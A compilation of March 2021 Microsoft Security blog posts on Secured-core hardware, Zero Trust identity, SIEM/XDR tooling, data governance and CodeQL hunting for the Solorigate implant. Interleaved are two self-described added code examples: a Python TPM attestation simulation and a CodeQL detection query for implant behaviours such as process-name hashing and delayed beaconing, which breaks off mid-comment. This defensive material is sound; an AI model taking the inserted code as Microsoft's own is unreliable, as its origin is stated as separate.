To see these features in action when I take the Microsoft Ignite stage tomorrow, register for free at Microsoft Ignite and watch my session starting at 5 PM Pacific Time. Follow Microsoft Identity at @AzureAD on Twitter for more news and best practices.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security Blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Identity at Microsoft Ignite: Strengthening Zero Trust defenses in the era of hybrid work appeared first on Microsoft Security.

Microsoft brings advanced hardware security to Server and Edge with Secured-core

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

A cursory look at recent headlines reveals two clear trends. First, organizations around the world are embracing digital transformation using technologies across cloud and edge computing to better serve their customers and thrive in fast-paced environments. Second, attackers are constantly innovating new attacks as technology changes and targeting these organizations’ high-value infrastructure with advanced technical capabilities connected to both cybercrime and espionage.

The MagBo marketplace, which sells access to more than 43,000 hacked servers, exemplifies the ever-expanding cybercrime threat. Compromised servers are being exploited to mine cryptocurrency and are being hit with ransomware attacks. Meanwhile, IoT vulnerabilities are on the rise, with more than half of IoT devices deemed susceptible to attack. In addition to these risks, companies often struggle with a lack of expertise and familiarity with security standards as well as complex regulations like the IoT Cybersecurity Improvement Act of 2020.

Given these factors, continuing to raise the security bar for critical infrastructure against attackers and also make it easy for organizations to hit that higher bar is a clear priority for both customers and Microsoft. As systems like the Xbox show, successfully protecting systems requires a holistic approach that builds security from the chip to the cloud across hardware, firmware, and the operating system. Using our learnings from the Secured-core PC initiative, Microsoft is collaborating with partners to expand Secured-core to Windows Server, Azure Stack HCI, and Azure-certified IoT devices, as well as bring the Secured-core values of advanced hardware-based protection and simpler security enablement to the server and IoT ecosystem.

Powerful protection with Secured-core Server and Edge Secured-core

Following Secured-core PC, we are introducing Secured-core Server, which is built on three key pillars: simplified security, advanced protection, and preventative defense. Secured-core Servers come with the assurance that manufacturing partners have built hardware and firmware that satisfy the requirements of the operating system (OS) security features. Like Secured-core PC and Secured-core Server, Edge Secured-core advances built-in security for IoT devices running a full OS. Edge Secured-core also expands Secured-core coverage to Linux, in addition to Windows platforms.

Simplified security

New functionality in the Windows Admin Center makes it easy for customers to configure the OS security features of Secured-core for Windows Server and Azure Stack HCI systems. The new Windows Admin Center security functionality allows administrators to enable advanced security with the click of a button from a web browser anywhere in the world. With integrated Azure Stack HCI systems, manufacturing partners can also enable OS features, further simplifying the configuration experience for customers so that Microsoft’s best server security is available right out of the box. For Windows Server and validated Azure Stack HCI solutions, customers can look for Secured-core certified systems to simplify acquiring secure hardware platforms.

The Azure Certified Device program already helps customers find the right edge and IoT solutions for their needs. We are adding the Edge Secured-core public preview to the Azure Certified Device program. Edge Secured-core devices meet extra security requirements around device identity, secure boot, OS hardening, device updates, data protection, and vulnerability disclosures, and they will be uniquely identifiable in the Azure Certified Device catalog.

Advanced protection

Secured-core Servers maximize hardware, firmware, and OS capabilities to help protect against current and future threats. These safeguards create a platform with added security for critical applications and data used on the server. Secured-core functionality spans the following areas:

  • Hardware root-of-trust: Trusted Platform Module 2.0 (TPM 2.0) comes standard with Secured-core Servers, providing a protected store for sensitive keys and data, such as measurements of the components loaded during boot. Being able to verify that firmware that runs during boot is validly signed by the expected author and not tampered with helps improve supply chain security. This hardware root-of-trust elevates the protection provided by capabilities like BitLocker, which uses the TPM 2.0 and facilitates the creation of attestation-based workflows that can be incorporated into zero-trust security strategies.
  • Firmware protection: In the last few years, there has been a significant uptick in firmware vulnerabilities, in large part due to the high level of privilege at which firmware runs, combined with the limited visibility into firmware that traditional anti-virus solutions have. Using processor support for Dynamic Root of Trust for Measurement (DRTM) technology, Secured-core systems put firmware in a hardware-based sandbox, helping to limit the impact of vulnerabilities in millions of lines of highly privileged firmware code.
  • Virtualization-based security (VBS): Secured-core Servers support VBS and hypervisor-based code integrity (HVCI). The cryptocurrency mining attack mentioned earlier leveraged the EternalBlue exploit. VBS and HVCI help protect against this entire class of vulnerabilities by isolating privileged parts of the OS, like the kernel, from the rest of the system. This helps to ensure that servers remain devoted to running critical workloads and helps protect related applications and data from attack and exfiltration.
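The root-of-trust and attestation workflow described above can be made concrete with a small simulation. This is an added example, not Microsoft's or any OEM's code: it models the TPM 2.0 PCR extend operation (the real one-way hash chain a TPM uses to record boot measurements) and a verifier that checks a signed quote against a golden value. The boot component images, the attestation key, and the use of HMAC as a stand-in for the TPM's asymmetric attestation-key signature are all constructed for the example.

```python
"""Simulation of TPM-style measured boot and remote attestation.

Added example, not code from the page or from Microsoft. The PCR extend
construction matches how a TPM 2.0 chains measurements; the quote
signature uses HMAC as a stand-in for the TPM attestation key (assumption).
"""
import hashlib
import hmac

HASH = hashlib.sha256
PCR_INIT = b"\x00" * 32  # PCRs reset to all-zeros at power-on


def extend(pcr: bytes, component: bytes) -> bytes:
    """TPM2_PCR_Extend: new = H(old || H(component)).

    Extend is one-way and order-sensitive. Only a reboot resets the PCR,
    so a later boot stage cannot erase the record of an earlier one.
    """
    return HASH(pcr + HASH(component).digest()).digest()


def measure_boot(components) -> bytes:
    """Extend each boot component into one PCR, in load order."""
    pcr = PCR_INIT
    for comp in components:
        pcr = extend(pcr, comp)
    return pcr


def make_quote(pcr: bytes, nonce: bytes, attestation_key: bytes) -> dict:
    """Device side: sign (PCR || nonce).

    The verifier-supplied nonce binds the quote to this challenge, so a
    quote captured from an earlier healthy boot cannot be replayed.
    """
    sig = hmac.new(attestation_key, pcr + nonce, HASH).digest()
    return {"pcr": pcr, "nonce": nonce, "sig": sig}


def verify_quote(quote: dict, expected_nonce: bytes, attestation_key: bytes,
                 golden_pcr: bytes):
    """Verifier side: check freshness, then authenticity, then the measurement."""
    if quote["nonce"] != expected_nonce:
        return False, "stale or replayed quote"
    expected_sig = hmac.new(attestation_key, quote["pcr"] + quote["nonce"], HASH).digest()
    if not hmac.compare_digest(quote["sig"], expected_sig):
        return False, "signature invalid"
    if not hmac.compare_digest(quote["pcr"], golden_pcr):
        return False, "boot chain does not match golden measurement"
    return True, "attested"


# Constructed stand-ins for the firmware, boot loader and kernel images.
GOLDEN_CHAIN = [b"UEFI-FW v1.0", b"bootmgr v1.0", b"ntoskrnl v1.0"]
GOLDEN_PCR = measure_boot(GOLDEN_CHAIN)          # the verifier's reference value
ATTESTATION_KEY = b"constructed-attestation-key"  # stand-in for the TPM AK


def attest(chain, nonce: bytes, quote_nonce: bytes = None):
    """Run one boot plus attestation round and return (ok, reason).

    quote_nonce lets a caller simulate a device answering with a quote
    made for a different (older) challenge.
    """
    pcr = measure_boot(chain)
    quote = make_quote(pcr, quote_nonce if quote_nonce is not None else nonce, ATTESTATION_KEY)
    return verify_quote(quote, nonce, ATTESTATION_KEY, GOLDEN_PCR)


if __name__ == "__main__":
    print("golden boot:   ", attest(GOLDEN_CHAIN, b"challenge-1"))
    tampered = [b"UEFI-FW v1.0 (modified)"] + GOLDEN_CHAIN[1:]
    print("tampered fw:   ", attest(tampered, b"challenge-1"))
    print("replayed quote:", attest(GOLDEN_CHAIN, b"challenge-2", quote_nonce=b"challenge-1"))
```

Two properties of the extend chain are worth noting for a zero-trust policy: a single changed byte in any stage changes the final PCR, and so does loading the same stages in a different order, so the golden value captures both content and sequence. The verifier deliberately checks the nonce before the signature and the signature before the PCR value, so that an unauthenticated quote is never compared against the reference.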

Edge Secured-core devices come with a built-in security agent, a zero-trust attestation model, and security by default, delivering on the following security features:

  • Hardware-based device identity.
  • Enforcement of system integrity.
  • Kept up to date and remotely manageable.
  • Protection for data at rest and data in transit.
  • Built-in security agent and hardening.

Preventative defense

Secured-core Servers and Edge Secured-core have security mitigations built into the hardware and OS platform to help thwart common attack vectors. Secured-core functionality helps proactively close the door on the many paths that attackers may try to exploit, and it allows IT and SecOps teams to optimize their time across other priorities.

Coming soon, with the support of the ecosystem

Secured-core Servers across Windows Server 2022 and Azure Stack HCI will help customers stay ahead of attackers and help protect their infrastructure across hardware, firmware, and operating systems. Supported hardware will be available in future product generations from Intel, AMD, and our vibrant OEM ecosystem.

“Continuing the rich tradition of innovation in hardware security, AMD is excited to partner with Microsoft to enable Secured-core Server with its future EPYC processors,” said Akash Malhotra, AMD director, security product management. “With attacks on firmware increasing, a tight integration between AMD hardware security features and the Windows Server operating system will benefit users across the ecosystem.”

“Today’s distributed world demands a new era of security. Intel and Microsoft are working together to provide innovative levels of security controls that provide customers with unified, integrated protection,” said Jeremy Rader, General Manager, Intel Cloud and Enterprise Group. “We’re combining the power of Secured core server with our 3rd Gen Intel Xeon Scalable processors (code-named Ice Lake) that creates a chain of trust across all layers of compute, from the hardware, to the firmware to the OS. Customers get a seamless root of trust that combines the most advanced security with management ease.”

You can learn more about Secured-core Servers and Windows Server 2022 security in the related blog.

To get started with Edge Secured-core certification, browse the following resources:

To learn more about Secured-core Servers and Edge Secured-core, be sure to join us during Microsoft Ignite from March 2-4, 2021.

The post Microsoft brings advanced hardware security to Server and Edge with Secured-core appeared first on Microsoft Security.

4 ways Microsoft is delivering security for all in a Zero Trust world

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

If there’s one thing the dawning of 2021 has shown, it’s that security isn’t getting any easier. Recent high-profile breach activity has underscored the growing sophistication of today’s threat actors and the complexity of managing business risk in an increasingly connected world. It’s a struggle for organizations of every size and for the public and private sector alike. As we move into this next phase of digital transformation, with technology increasingly woven into our most basic human activities, the questions that we as security defenders must ask ourselves are these: How do we help people to have confidence in the security of their devices, their data, and their actions online? How do we protect people, so they have peace of mind and are empowered to innovate and grow their future? How do we foster trust in a Zero Trust world?

As defenders ourselves, we are passionate proponents of a Zero Trust mindset, encompassing all types of threats—both outside in and inside out. We believe the right approach is to address security, compliance, identity, and device management as an interdependent whole and to extend protection to all data, devices, identities, platforms, and clouds—whether those things are from Microsoft or not.

You may have heard us talk about our commitment to security for all, and that’s at the heart of it. We are deeply inspired to empower people everywhere to do the important work of defending their communities and their organizations in an ever-evolving threat landscape.

With that approach in mind, today I’m excited to share several additional innovations across four key areas with you—identity, security, compliance, and skilling—to give you the holistic security protection you need to meet today’s most challenging security demands.

1. Identity: The starting point of a Zero Trust approach

Adopting a Zero Trust strategy is a journey. Every single step you take will make you more secure. In today’s world, with disappearing corporate network perimeters, identity is your first line of defense. While your Zero Trust journey will be unique, if you are wondering where to start, our recommendation is to start with a strong cloud identity foundation. The most fundamental steps like strong authentication, protecting user credentials, and protecting devices are the most essential.

Today we are announcing new ways that Azure Active Directory (Azure AD), the cloud identity solution of choice for more than 425 million users, can help you on your Zero Trust journey:

  • Passwordless authentication, which eliminates one of the weakest links in security today, is now generally available for cloud and hybrid environments. Now you can create end-to-end experiences for all employees, so they no longer need passwords to sign in to the network. Instead, Azure AD now lets them sign in with biometrics or a tap using Windows Hello for Business, the Microsoft Authenticator app, or a compatible FIDO2 security key from Microsoft Intelligent Security Association partners such as Yubico, Feitian, and AuthenTrend. With Temporary Access Pass, now in preview, you can generate a time-limited code to set up or recover a passwordless credential.
  • Azure AD Conditional Access, the policy engine at the heart of our Zero Trust solution, now uses authentication context to enforce even more granular policies based on user actions within the app they are using or sensitivity of data they are trying to access. This helps you appropriately protect important information without unduly restricting access to less sensitive content.
  • Azure AD verifiable credentials is entering preview in just a few weeks. Verifiable credentials let organizations confirm information someone provides—like their education or professional certifications—without collecting and storing that person’s personal data, thereby improving security and privacy. In addition, new partnerships integrating Azure AD verifiable credentials with leading identity verification providers like Onfido, Socure, and others will improve verifiability and secure information exchange. Customers such as Keio University, the government of Flanders, and the National Health Service in the UK are already piloting verifiable credentials.

Learn more about our Azure AD announcements in today’s blog post by Joy Chik.

2. Security: Simplifying the “assume breach” toolset

In today’s landscape, your security approach should start with the key Zero Trust principle of assume breach. But too often, complexity and fragmentation stand in the way. We are committed to helping you solve this, as we build security for all, delivered from the cloud.

This begins with integrated solutions that let you focus on what matters and deliver visibility across all your platforms and all your clouds. Some vendors deliver endpoint or email protection, while others deliver Security Information and Event Management (SIEM) tools, and integrating those pieces together can be a time-consuming challenge. Microsoft takes a holistic approach that combines best-of-breed SIEM and extended detection and response (XDR) tools built from the ground up in the cloud to improve your posture, protection, and response. This gives you the best-of-breed combined with the best-of-integration so you don’t have to compromise.

Today we are making the following announcements to simplify the experience for defenders with modern and integrated capabilities:

  • Microsoft Defender for Endpoint and Defender for Office 365 customers can now investigate and remediate threats from the Microsoft 365 Defender portal. It provides unified alerts, user and investigation pages for deep, automated analysis and simple visualization, and a new Learning Hub where customers can leverage instructional resources with best practices and how-tos.
  • Incidents, schema, and user experiences are now common between Microsoft 365 Defender and Azure Sentinel. We also continue to expand connectors for Azure Sentinel and work to simplify data ingestion and automation.
  • The new Threat Analytics provides a set of reports from expert Microsoft security researchers that help you understand, prevent, and mitigate active threats, like the Solorigate attacks, directly within Microsoft 365 Defender.
  • We are bringing Secured-core to Windows Server and edge devices to help minimize risk from firmware vulnerabilities and advanced malware in IoT and hybrid cloud environments.

Learn more about our threat protection announcements in today’s blog post by Rob Lefferts and Eric Doerr. Learn more about our Secured-core announcements in today’s blog post by David Weston. You can also learn more about new security features in Microsoft Teams in today’s blog post by Jared Spataro.

Today’s announcements continue, and strengthen, our commitment to deliver best-of-breed protection, detection, and response for all clouds and all platforms with solutions like Defender for Endpoint—a leader in the Gartner Magic Quadrant, available for Android, iOS, macOS, Linux, and Windows; and Azure Sentinel—which looks across your multi-cloud environments, including AWS, Google Cloud Platform, Salesforce service cloud, VMware, and Cisco Umbrella.

3. Compliance: Protection from the inside out

At Microsoft, we think of Zero Trust as not only the practice of protecting against outside-in threats, but also protecting from the inside out. For us, addressing the area of compliance includes managing risks related to data.

And that isn’t just the data stored in the Microsoft cloud, but across the breadth of clouds and platforms you use. We’ve invested in creating that inside-out protection by extending our capabilities to third parties to help you reduce risk across your entire digital estate.

Today we are announcing these new innovations in compliance:

  • Co-authoring of documents protected with Microsoft Information Protection. This enables multiple users to work simultaneously on protected documents while taking advantage of the intelligent, unified, and extensible protection for documents and emails across Microsoft 365 apps.
  • Microsoft 365 Insider Risk Management Analytics, which can identify potential insider risk activity within an organization and help inform policy configurations. With one click, customers can have the system run a daily scan of their tenant audit logs, including historical activity, and leverage Microsoft 365’s Insider Risk Management machine learning engine to identify potential risky activity with privacy built-in by design.
  • Microsoft 365 now offers data loss prevention (DLP) for Chrome browsers and on-premises server-based environments such as file shares and SharePoint Server.
  • Azure Purview is integrated with Microsoft Information Protection, enabling you to apply the same sensitivity labels defined in Microsoft 365 Compliance Center to data residing in other clouds or on-premises. With Azure Purview, a unified data governance solution for on-premises, multi-cloud, and software as a service (SaaS) data, you can scan and classify data residing in AWS Simple Storage Services (S3), SAP ECC, SAP S4/HANA, and Oracle Database.

Learn more about our compliance announcements in today’s blog post by Alym Rayani.

4. Skilling: Power your future through security skilling

We know that many of you continue to struggle to fill the security skills gap with an estimated shortfall of 3.5 million security professionals by 2021. That’s why we strive to ensure you have the skilling and learning resources you need to keep up in our world of complex cybersecurity attacks. We are excited to announce two different ways Microsoft is supporting skilling cybersecurity professionals.

First, Microsoft has four new security, compliance, and identity certifications tailored to your roles and needs, regardless of where you are in your skilling journey. To learn more about these new certifications, please visit our resource page for Microsoft Certifications.

  • Security, Compliance, and Identity Fundamentals certification will help individuals get familiar with the fundamentals of security, compliance, and identity across cloud-based and related Microsoft services.
  • Information Protection Administrator Associate certification focuses on planning and implementing controls that meet organizational compliance needs.
  • Security Operations Analyst Associate certification helps security operational professionals design threat protection and response systems.
  • Identity and Access Administrator Associate certification helps individuals design, implement, and operate an organization’s identity and access management systems by using Azure Active Directory.

We also recognize that the world we live in is complex, but growing your skills shouldn’t be. The Microsoft Security Technical Content Library will help you find content relevant to your needs. Use it to access content based on your own needs today.

You can also learn more on today’s Tech Community blog post.

Security for all

We at Microsoft Security are committed to helping build a safer world for all. Every day, we are inspired by the work of our defenders and we are focused on delivering innovations, expertise, and resources that tip the scale in favor of defenders everywhere because the work you do matters. Security is a team sport, and we’re all in this together.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 4 ways Microsoft is delivering security for all in a Zero Trust world appeared first on Microsoft Security.

Microsoft unifies SIEM and XDR to help stop advanced attacks

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

For all of us in security, the last twelve months have been an incredible series of challenges—from balancing remote work with family priorities, to helping build resilient businesses, and protecting against the latest attacks. 2020 showed us that while we have made great progress, there is still a lot we can do as individuals, organizations, and as a community to keep secure. Here at Microsoft, we’re committed to applying these learnings to help create a stronger, more unified approach to security for all—no matter what platform you’re on, device you’re trying to protect, or cloud your data is in.

To help protect against advanced attacks, last September at Microsoft Ignite we shared our vision to create the most complete approach to securing your digital landscape, all under a single umbrella. We combined the breadth of Azure Sentinel, our cloud-native SIEM (security information and event management) with the depth of Microsoft 365 Defender and Azure Defender, our XDR (extended detection and response) tools, to help fight against attacks that take advantage of today’s diverse, distributed, and complex environments.

Today we are taking the next step in unifying these experiences and delivering enhanced tools and intelligence to stop modern threats.

Unified experiences

Most SIEMs on the market today simply take logs from multiple sources. Azure Sentinel accepts logs across your environment with many third-party security products and can go a step further with Azure Defender and Microsoft 365 Defender. Starting today, incidents, schema, and alerts are shared between Azure Sentinel and Microsoft 365 Defender. This means you get a unified view in Azure Sentinel, then can seamlessly drill down into an incident for more context in Microsoft 365 Defender.

For example: Start in Azure Sentinel for your bird’s-eye view to understand an overarching incident, then move directly into Microsoft 365 Defender to investigate an asset or a user in more detail. You can even remediate and close the incident directly within Microsoft 365 Defender, all while maintaining bi-directional syncing with Azure Sentinel. This is next-level SIEM integration you won’t find anywhere else.

On the Microsoft 365 Defender side, we are working to reduce the number of portal experiences. The goal is to have a single unified XDR experience for securing end-user environments, rather than a suite of products. Today marks a significant milestone in that effort as we integrate the capabilities of Microsoft Defender for Endpoint and Defender for Office 365 together into the unified Microsoft 365 Defender portal. These changes simplify tasks that would require multiple experiences across comparable products in the market. We have also taken the opportunity to significantly enhance the email entity page with a new 360-degree view of email alerts with relevant context and email alert capabilities.

Enhanced tools and intelligence to stop advanced attacks

As well as unifying the capabilities of Microsoft Defender for Endpoint and Defender for Office 365 into Microsoft 365 Defender, we have also created new enhanced experiences including:

  • Threat Analytics, now in preview, provides detailed threat intelligence reports from expert Microsoft security researchers that help you understand, prevent, and mitigate active threats.
  • Learning Hub where you can use instructional resources with best practices and how-tos.
  • Attack Simulation Training in Microsoft Defender for Office 365 which helps you detect, prioritize, and remediate phishing risks. It uses neutralized versions of real attacks to simulate the continually changing attacker landscape, enabling highly accurate and up-to-date detection of risky behavior, with rich reporting and analytics to help customers measure their progress.

With Azure Sentinel, we’re focused on giving you a richer organization-wide view with expanded data collection and helping you to respond faster with new incident response and automation capabilities. Today we are announcing more than 30 new connectors to simplify data collection across your entire environment, including multi-cloud environments. These new connectors include Salesforce service cloud, VMware, Cisco Umbrella, and Microsoft Dynamics.

We’re also expanding Azure Sentinel’s SOAR capabilities. Today we’re introducing automation rules (a new and simple framework for automating common tasks), and new automation connectors with additional built-in SOAR playbooks. These new playbooks enable automation workflows such as blocking a suspicious IP address with Azure Firewall, isolating endpoint devices with Microsoft Intune, or updating the risk state of a user with Azure Active Directory Identity Protection. You can learn more about these Azure Sentinel innovations on the Azure Sentinel Microsoft Ignite 2021 announcement blog.

Finally, Azure Defender now provides improved alert features, including an improved triage experience with better performance for larger alert lists, alerts from Azure Resource Graph, a sample-creation feature for Azure Defender alerts, and alignment with Azure Sentinel’s incident experience. To learn more about these and other Azure Security Center announcements, please read the Azure Security Center Microsoft Ignite 2021 announcement blog.

Looking ahead

We’ve been on a long journey to figure out how to understand and help you protect against advanced attacks. We’re only just getting started on our mission and will continue to unify tools and add intelligence to help keep your environment healthy and secure.

Be sure to check out our Microsoft Ignite session, and learn more about our SIEM + XDR offering.

As always, thank you for your continued partnership on this journey.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

-Rob, Eric, and our entire Microsoft Security Team

The post Microsoft unifies SIEM and XDR to help stop advanced attacks appeared first on Microsoft Security.

Securing and governing data in a new hybrid work reality

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

The past year has led to an evolution in not only how we think about work, but more importantly, where work gets done. Arguably, gone are the days that your organization’s data is limited to the protected confines of your corporate network as your people continue to work remotely, return in some capacity to the office, or even adopt some hybrid of the two. With your people working across networks, devices, clouds, and apps, how do you ensure your data remains not only secure but compliant?

A culture of security starts by securing data where people get work done. We have been investing in innovation to make this easier, and I’m sharing with you some additional capabilities that enable you to extend data protection and governance across apps, clouds, endpoints, and on-premises file repositories that keep your people collaborative and productive while ensuring your most valuable asset—your data—remains secure and compliant wherever it lives.

Co-authoring of Microsoft Information Protection-protected documents now available in preview

With the shift to remote work, people are creating, storing, and sharing data in new ways. Collaboration and productivity are critical to getting work done, but you still need to ensure that the data remains safe wherever it is. Data classification in Microsoft Information Protection protects your business-critical data so your people can collaborate securely without having to sacrifice productivity.

Today we are announcing the ability for multiple users to simultaneously edit a Microsoft Office document that has been encrypted using Microsoft Information Protection, now in preview. In the past, you had to choose between encrypting sensitive content and collaborating on it. If you encrypted the content, only one person could edit at a time. Everyone else would be locked out, and AutoSave would be disabled to preserve the encryption. With this new unique capability, multiple people can now be co-authors on a Word, Excel, or PowerPoint document simultaneously, frictionlessly, with auto-save, while maintaining the sensitivity labeling and document protections.

Learn more on Microsoft docs.

Microsoft 365 data loss prevention now available in preview for Chrome and on-premises

Enabling a comprehensive and flexible approach to data loss prevention solutions is one of the most important ways to protect your data. We have been investing heavily in this area, and our unified Data Loss Prevention (DLP) solution—a key part of Microsoft Information Protection—understands and classifies your data, keeps it protected, and prevents data loss across Microsoft 365 Apps (including Word, PowerPoint, Excel, and Outlook), services (including Microsoft Teams, SharePoint, and Exchange), third-party software as a service (SaaS) applications, and more—on-premises or in the cloud. Microsoft’s unified data loss prevention approach provides simplicity, enabling you to set a DLP policy once and have it enforced across services, endpoints, and first- and third-party apps.

A few months ago, we announced Endpoint DLP, which provides built-in data loss prevention into Windows 10 and Microsoft Edge. Today we’re announcing that we are extending Microsoft’s unified DLP capabilities natively to Chrome browsers and on-premises file shares and SharePoint Server.

You can learn more about this preview on Tech Community.

Microsoft Azure Purview provides new multi-cloud support

In December 2020, we announced Azure Purview, a unified data governance service that facilitates the mapping and control of organizational data no matter where it resides. Azure Purview is integrated with Microsoft Information Protection, which means you can apply the same sensitivity labels defined in Microsoft 365 Compliance Center to your data in Azure.

Today we’re sharing that we are extending Azure Purview’s ability to automatically scan and classify data to other platforms, such as AWS Simple Storage Services (S3), SAP ECC, SAP S4/HANA, and Oracle Database. Available now in preview, this lets you automatically scan and classify data residing within various on-premises data stores using the Azure Purview Data Map.

We are also expanding the insight available within Azure Purview. Available now in preview, Azure Purview can now scan Azure Synapse Analytics workspaces, which enables you to discover and govern data across your serverless and dedicated SQL pools. This expands on Azure Purview’s existing tools enabling customers to scan data across various sources via out-of-the-box connectors in the Data Map.

You can learn more in the Azure Purview blog.

Microsoft 365 Insider Risk Management Analytics available in preview

Another important component of securing your data as people work in new and different ways is effectively managing insider risk. Balancing the ability to quickly identify and manage insider risks while maintaining a dynamic culture of trust and collaboration is a priority for security leaders.

With privacy built-in, pseudonymization on by default, and strong role-based access controls, Insider Risk Management in Microsoft 365 is used by businesses worldwide to quickly get started using machine learning to identify insider risks and take action with integrated collaboration workflows.

Today we’re announcing Microsoft 365 Insider Risk Management Analytics, which can identify potential insider risk activity within an organization and help inform policy configurations. With one click, customers can have the system run a daily scan of their tenant audit logs, including historical activity, and leverage Microsoft 365’s Insider Risk Management Machine Learning engine to identify potential risky activity with privacy built-in by design. Insider Risk Management Analytics will start rolling out to tenants in public preview in mid-March 2021.

For more information, check out the Tech Community blog.

Continued investments to help you address compliance and risk

We’ve been hard at work across our entire portfolio to ensure you have the capabilities you need to protect and govern your data while addressing regulatory compliance and eDiscovery. Here are a few more announcements we’re making today:

  • Additional assessment templates and enhanced capabilities in Compliance Manager to increase regulation visibility, further enrich the user experience, and save you valuable time.
  • Further guidance to get started with Advanced Audit to support your forensic investigations when you suspect a data breach.

In addition, our partner ecosystem plays a critical role in helping you to address your compliance and risk management needs. I’m announcing today that we are expanding the Microsoft Intelligent Security Association (MISA) to include risk management and compliance partners to enable greater scale and customization.

We will continue to innovate and work closely alongside you, our partners, and the industry to improve compliance and security for everyone. We’re on this journey together.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Securing and governing data in a new hybrid work reality appeared first on Microsoft Security.

Microsoft open sources CodeQL queries used to hunt for Solorigate activity

Microsoft Malware Protection Center - Thu, 02/25/2021 - 11:00am

A key aspect of the Solorigate attack is the supply chain compromise that allowed the attacker to modify binaries in SolarWinds’ Orion product. These modified binaries were distributed via previously legitimate update channels and allowed the attacker to remotely perform malicious activities, such as credential theft, privilege escalation, and lateral movement, to steal sensitive information. The incident has reminded organizations to reflect not just on their readiness to respond to sophisticated attacks, but also the resilience of their own codebases.

Microsoft believes in leading with transparency and sharing intelligence with the community for the betterment of security practices and posture across the industry as a whole. In this blog, we’ll share our journey in reviewing our codebases, highlighting one specific technique: the use of CodeQL queries to analyze our source code at scale and rule out the presence of the code-level indicators of compromise (IoCs) and coding patterns associated with Solorigate. We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis. Note that the queries we cover in this blog simply serve to home in on source code that shares similarities with the source in the Solorigate implant, either in the syntactic elements (names, literals, etc.) or in functionality. Both can occur coincidentally in benign code, so all findings will need review to determine if they are actionable. Additionally, there is no guarantee that the malicious actor is constrained to the same functionality or coding style in other operations, so these queries may not detect other implants that deviate significantly from the tactics seen in the Solorigate implant. These should be considered as just a part in a mosaic of techniques to audit for compromise.

Microsoft has long had integrity controls in place to verify that the final compiled binaries distributed to our servers and to our customers have not been maliciously modified at any point in the development and release cycle. For example, we verify that the source file hashes generated by the compiler match the original source files. Still, at Microsoft, we live by the “assume breach” philosophy, which tells us that regardless of how diligent and expansive our security practices are, potential adversaries can be equally as clever and resourced. As part of the Solorigate investigation, we used both automated and manual techniques to validate the integrity of our source code, build environments, and production binaries and environments.

Microsoft’s contribution during Solorigate investigations reflects our commitment to a community-based sharing vision described in Githubification of InfoSec. In keeping with our vision to grow defender knowledge and speed community response to sophisticated threats, Microsoft teams have openly and transparently shared indicators of compromise, detailed attack analysis and MITRE ATT&CK techniques, advanced hunting queries, incident response guidance, and risk assessment workbooks during this incident. Microsoft encourages other security organizations that share the “Githubification” vision to open source their own threat knowledge and defender techniques to accelerate defender insight and analysis. As we have shared before, we have compiled a comprehensive resource for technical details of the attack, indicators of compromise, and product guidance at As part of Microsoft’s sweeping investigation into Solorigate, we reviewed our own environment. As we previously shared, these investigations found activity with a small number of internal accounts, and some accounts had been used to view source code, but we found no evidence of any modification to source code, build infrastructure, compiled binaries, or production environments.

A primer on CodeQL and how Microsoft utilizes it

CodeQL is a powerful semantic code analysis engine that is now part of GitHub. Unlike many analysis solutions, it works in two distinct stages. First, as part of the compilation of source code into binaries, CodeQL builds a database that captures the model of the compiling code. For interpreted languages, it parses the source and builds its own abstract syntax tree model, as there is no compiler. Second, once constructed, this database can be queried repeatedly like any other database. The CodeQL language is purpose-built to enable the easy selection of complex code conditions from the database.

One of the reasons we find so much utility from CodeQL at Microsoft is specifically because this two-stage approach unlocks many useful scenarios, including being able to use static analysis not just for proactive Secure Development Lifecycle analysis but also for reactive code inspection across the enterprise. We aggregate the CodeQL databases produced by the various build systems or pipelines across Microsoft to a centralized infrastructure where we have the capability to query across the breadth of CodeQL databases at once. Aggregating CodeQL databases allows us to search semantically across our multitude of codebases and look for code conditions that may span between multiple assemblies, libraries, or modules based on the specific code that was part of a build. We built this capability to analyze thousands of repositories for newly described variants of vulnerabilities within hours of the variant being described, but it also allowed us to do a first-pass investigation for Solorigate implant patterns similarly, quickly.

We are open sourcing several of the C# queries that assess for these code-level IoCs, and they can currently be found in the CodeQL GitHub repository. The within that repo contains detailed descriptions of each query and what code-level IoCs each one is attempting to find. It also contains guidance for other query authors on making adjustments to those queries or authoring queries that take a different tactic in finding the patterns.

GitHub will shortly publish guidance on how they are deploying these queries for existing CodeQL customers. As a reminder, CodeQL is free for open-source projects hosted by GitHub.

Our approach to finding code-level IoCs with CodeQL queries

We used two different tactics when looking for code-level Solorigate IoCs. One approach looks for particular syntax that stood out in the Solorigate code-level IoCs; the other approach looks for overall semantic patterns for the techniques present in the code-level IoCs.

The syntactic queries are very quick to write and execute while offering several advantages over comparable regular expression searches; however, they are brittle to the malicious actor changing the names and literals they use. The semantic patterns look for the overall techniques used in the implant, such as hashing process names, time delays before contacting the C2 servers, etc. These are durable to substantial variation, but they are more complicated to author and more compute-intensive when analyzing many codebases at once.

By combining these two approaches, the queries are able to detect scenarios where the malicious actor changed techniques but used similar syntax, or changed syntax but employed similar techniques. Because it’s possible that the malicious actor could change both syntax and techniques, CodeQL was but one part of our larger investigative effort.
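As an added illustration of the two tactics described above (this is not one of the queries Microsoft published), the following C# CodeQL query sketches a syntactic match on a string literal and two simplified semantic matches, process names flowing into a hash computation and long literal sleeps. The IoC literal is a placeholder, the "%hash%" name match and the one-hour sleep threshold are assumptions, and the data flow is intra-procedural only.

```ql
/**
 * @name Solorigate-style code-level IoC sketch (added illustration)
 * @description Flags string literals matching a known IoC (syntactic) and
 *              process-name hashing or long pre-beacon sleeps (semantic).
 *              Every hit needs human review; benign code can match too.
 * @kind problem
 * @problem.severity warning
 * @id example/solorigate-ioc-sketch
 */

import csharp

/**
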